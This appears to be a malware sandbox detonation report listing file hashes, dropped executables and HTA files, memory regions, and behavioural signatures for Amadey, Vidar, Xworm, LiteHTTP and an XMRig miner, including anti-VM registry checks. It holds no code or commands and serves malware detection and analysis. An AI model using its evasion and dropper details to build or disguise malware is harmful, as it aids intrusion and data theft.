US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp

Files

C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta

MD5 214ecd61b6d16ec0d47c54fc8f1d874c
SHA1 2ba8788b961a887b4578b7c3173b68de4ceeb285
SHA256 0e4d41f19004b61605bc2b6bf11ff24272dfdb792c8090a63445dd0fa52cc42c
SHA512 e14107749af4af7a0e3919a942b6c423a64b6de1fa554f69dea904d2352513dc06b50e889bbaeeaf6becaa9a4226150ce8de26b1c0a6181b0c1f67c1c7b40fb8

\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/2924-13-0x0000000006540000-0x00000000069FF000-memory.dmp

memory/2924-12-0x0000000006540000-0x00000000069FF000-memory.dmp

memory/2588-15-0x0000000000CE0000-0x000000000119F000-memory.dmp

memory/2108-30-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2588-28-0x0000000000CE0000-0x000000000119F000-memory.dmp

memory/2588-32-0x0000000000CE0000-0x000000000119F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/2108-56-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2108-57-0x0000000000DA0000-0x000000000125F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/2484-70-0x0000000000100000-0x0000000000110000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2240-88-0x00000000047D0000-0x0000000004C10000-memory.dmp

memory/600-87-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2240-86-0x00000000047D0000-0x0000000004C10000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe

MD5 83cd4a3ac24bea5dd2388d852288c7de
SHA1 059245d06571b62c82b059a16b046793f6753dbc
SHA256 a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
SHA512 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta

MD5 fc9b37b45ee22ac3220b9e280bfa4cd4
SHA1 d005ba15e722aeb452630ebe8274457a978672a6
SHA256 d592c1b0ad7641e0b504272de671e47fe302e95b7ac79787d0e682f306142cb6
SHA512 5c5a0466fcdda320464ede65bb8ad1e245f64a699242d7bb74dd949673bed836d426a53af9c6cb121a49bcad39bba7050536456b5655d191acbce2ee76367bfb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 5dc4cb488b998e7f96799fd8a4aade27
SHA1 aac3f7d78191710e2e85e80241e478b87a2e94dc
SHA256 b5d8b4da36ddf0e01681abbe6084ed4b2a5d6a08f91c1985d2fe728c0ad19ef0
SHA512 bc965ab8ee90252237c1e5fbcc45f3ba9c750035e1657326d0f9ef8b379e12bbaac6dcfd51cc7269e12cfd2c3ae5d1128edfa398b68902582dbdcc7e9db8945f

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2240-135-0x00000000047D0000-0x0000000004C10000-memory.dmp

memory/1516-133-0x0000000006520000-0x00000000069DF000-memory.dmp

memory/2392-134-0x0000000000090000-0x000000000054F000-memory.dmp

memory/2392-145-0x0000000000090000-0x000000000054F000-memory.dmp

memory/2108-146-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/600-147-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2408-152-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2240-151-0x00000000047D0000-0x0000000004C10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2557dc784d8bed899da42bf62724cd5c
SHA1 babf2ab1dd7624cad65b47f6bec76b8254b80c78
SHA256 f6d665e11a22e2e9b5682f69f3612659f4e72211aea2545d47f1183a6f6e8400
SHA512 a82b6aea76599ee61099d94babea87005f4e748a3ca673d795257689375194a2c8f3ca644f705d9a7271906b4a7cde438fa65abb25917541db447ee9331a31a9

C:\Windows\Tasks\Test Task17.job

MD5 dc66cb3280e093e23914366564673875
SHA1 2a737c4f5a73c37f2768a432d53e0de190fc6292
SHA256 c0f7a76f80ed92e1aaeabcf1355be95d5f8e6e0064a1b96f6be3d7df978f259b
SHA512 3e58e3c1cf14dd3c1be6a69b6379edb2a8e8aa678bd29cc3e7776b97f8fb876d4cc8f72bb6e68a7246b79697bf5c91e0f765ad628f172c40dd8f18f37fd365af

C:\Temp\GH8RmsOFg.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/600-177-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3032-186-0x00000000066C0000-0x0000000006B7F000-memory.dmp

memory/900-188-0x0000000000E80000-0x000000000133F000-memory.dmp

memory/900-189-0x0000000000E80000-0x000000000133F000-memory.dmp

memory/2408-190-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe

MD5 6afaf17077308fa040a656dc9e7d15ed
SHA1 df7caf0b424dc62a60dfb64f585c111448c0c1e3
SHA256 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
SHA512 cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

memory/2108-206-0x0000000006BC0000-0x00000000075CD000-memory.dmp

memory/2108-201-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2108-208-0x0000000006BC0000-0x00000000075CD000-memory.dmp

memory/2408-209-0x0000000000400000-0x0000000000840000-memory.dmp

memory/600-210-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1532-224-0x0000000000D00000-0x0000000000D78000-memory.dmp

memory/1688-240-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-238-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-237-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1688-233-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-231-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-229-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-227-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1688-235-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2108-251-0x0000000006BC0000-0x00000000075CD000-memory.dmp

memory/2108-252-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2144-253-0x00000000000E0000-0x0000000000AED000-memory.dmp

memory/1420-254-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2408-255-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1420-257-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2144-256-0x00000000000E0000-0x0000000000AED000-memory.dmp

memory/600-260-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1420-262-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2108-282-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2408-283-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/600-297-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2508-299-0x0000000001170000-0x0000000001DC1000-memory.dmp

memory/1572-302-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2508-301-0x0000000001170000-0x0000000001DC1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarF455.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1780-376-0x00000000008E0000-0x0000000000D8B000-memory.dmp

memory/2108-377-0x0000000000DA0000-0x000000000125F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2408-392-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2836-393-0x0000000000D60000-0x0000000001074000-memory.dmp

memory/600-396-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/2664-420-0x00000000008D0000-0x0000000000F57000-memory.dmp

memory/2108-422-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2408-424-0x0000000000400000-0x0000000000840000-memory.dmp

memory/600-425-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin

MD5 26216b4696bea895c77f97ec8b2a34b7
SHA1 6e6ff86cf5fa96b879f6903f3c8d439ca045ed51
SHA256 f8a19700888258aa1614eb7ee793f3e8e1ef5dd384cc6c5712e79c29075be16f
SHA512 61c19fd8ad715efdd4b73c2287cfa9dc2de45d478707db86afcbf0cf88d9f1fc5a5aabdf267bfed24babef55813c912d26a688adbe68402b1c70786f4f2e7e87

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\c518fcca-1407-49d2-acce-963862a8da65

MD5 968d571b2774dcc7a20b3ac02a1d0e34
SHA1 fca77952eae22f5ad0a2add88ca78fcdf77e0988
SHA256 b4d0d50aca4e94b5f12185d800f5189accf01bd4a97f598b79c6ff6678a1a046
SHA512 b69fbc7f651257ddac083b2b5fc342d245bc92378bd9bdaf75cb8b33c84cb57c30234dce5505da96ba92b2f52c9fd182649f91b1b2b846d1a4f0e2032e4f7275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\5ec7a57a-29aa-4f0d-b37b-c846b96d1281

MD5 275afce8f8bd93608b272b906aeebdf7
SHA1 e223d02e3f98621bf4d7b9299420f5abed3f5468
SHA256 2afd0138376f9c4fd55a80295e1b8aa428325d3532f9eabec21735f589be7cb5
SHA512 21aabeec972952c7098ed76943558bc27c80664e3c6a7ad2d885878477dc72e89674c260f517ba552b0730cf47edad4e6c86575241f0cfe825e70f1cd51248a7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp

MD5 e532ed9d9b666bc6827ad24488568157
SHA1 b34c35ba2b99c5e0eed8df9f8854db3a4825def4
SHA256 8307aed41502e0ae7d75fddcdcbc1d4547027d19b399d9f2121eac4819c21a85
SHA512 e83fd72d66d1cd2eb8e2e3e1919b8814979c073c1076827c95fc8307ea34f91f8c30208d572bd9eeb4f3ef2d888eea8f7d5101bc02ff09800bfd5bba2ab73e12

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

MD5 3224541ee499b1f30ea80393ab279d34
SHA1 a29eec2b9a9737651011649a620f51f89cdab692
SHA256 044e793993eeff6f292c87a71fde6453c9b13647b7c34c6015ed8f59d902b9c1
SHA512 f40bc72c0e85d50646f598fd027a8ee9cf624003d885b242d483abc45672234fcea180fced567bf76648c16d6ae488ff8a740aef4c8c0c0ca24555ec74c4fe07

memory/2108-587-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2408-588-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

memory/3500-607-0x00000000008F0000-0x0000000000D48000-memory.dmp

memory/3500-608-0x00000000008F0000-0x0000000000D48000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2108-637-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2408-638-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/3928-655-0x000000001B620000-0x000000001B902000-memory.dmp

memory/3928-656-0x0000000001E80000-0x0000000001E88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B4440P9RCO6GVIR8HWV3.temp

MD5 e14a3a6130eea99fc9d4dab7bc2f8585
SHA1 13c5150d1a5b53a0a8fc5f66889f1ff2d051b998
SHA256 d5c25e590f6d950b06baedbddb412bb6c510d79c31d7b782c92b7b8efff938aa
SHA512 29e4e0d9766be0ffa5787ff89cef5dfc1fd926f762ac194af5689ec1ea35a730a392aa8031aff8c2e666a9be6647413853d3bae71513ed19d2ffd6e95245c9ff

memory/4016-663-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

memory/4016-664-0x0000000002070000-0x0000000002078000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4

MD5 705d4552cb12e4353a7856d4e055653f
SHA1 db37fa7b6e9183bcb9ddb35ab77aa308f504aac0
SHA256 44eb8180c62f9c60d2bc76d32fec4e93de8e4b1c11d26cdcdb68f9429e308374
SHA512 01effe006b306f0d6d456cc268cc3bf3c35761e6e4e5e3487e348e450f3aed78cf17e840e756c09accac4c923bd97186521fc081a1162b75d4669ddbfc90ca45

memory/2108-671-0x0000000000DA0000-0x000000000125F000-memory.dmp

memory/2408-672-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/3420-685-0x0000000000FE0000-0x000000000147B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

MD5 42a55ffa2ffbc63efcb06872e64786f3
SHA1 5cdee127d3bfd6d9f3548cc2c31e7b4f7a96587e
SHA256 579816094a6f2e79199c4b58a949b030a88273364115d6e6a888ad09e6194412
SHA512 ab48b0830c379040e1e847e9f7e31062850ac97a9760a0dfc3c7edd4688f7124c335f10572a58d789f46e263baefb6b593b0274da32d2b23dd95e2dce2110eea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js

MD5 ec2d52962eeec7c1d536013b9b3e4399
SHA1 89dde681ca7fcd89e856b3403c27252b06a13f54
SHA256 776b553b4a2416d7994741b9231bafe346456203eab25d2ac318199b805f8015
SHA512 6608fd089b0067ef4c61c1ed5323f4cce4b72f538d4f965ab020ee030f2a801d58dc313791714ea1b9f14358b1bac541dc0911247461ca89e7a9fa46feebf00b

memory/2108-696-0x0000000000DA0000-0x000000000125F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/3800-707-0x0000000000FD0000-0x0000000001040000-memory.dmp

memory/896-721-0x0000000000400000-0x0000000000466000-memory.dmp

memory/896-712-0x0000000000400000-0x0000000000466000-memory.dmp

memory/896-709-0x0000000000400000-0x0000000000466000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/3504-732-0x0000000000830000-0x0000000000842000-memory.dmp

memory/3504-733-0x0000000000240000-0x0000000000250000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/4072-747-0x0000000000AA0000-0x0000000000B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

memory/4012-864-0x000000001B890000-0x000000001BB72000-memory.dmp

memory/4012-865-0x0000000002770000-0x0000000002778000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 23:06

Reported

2025-03-05 23:09

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
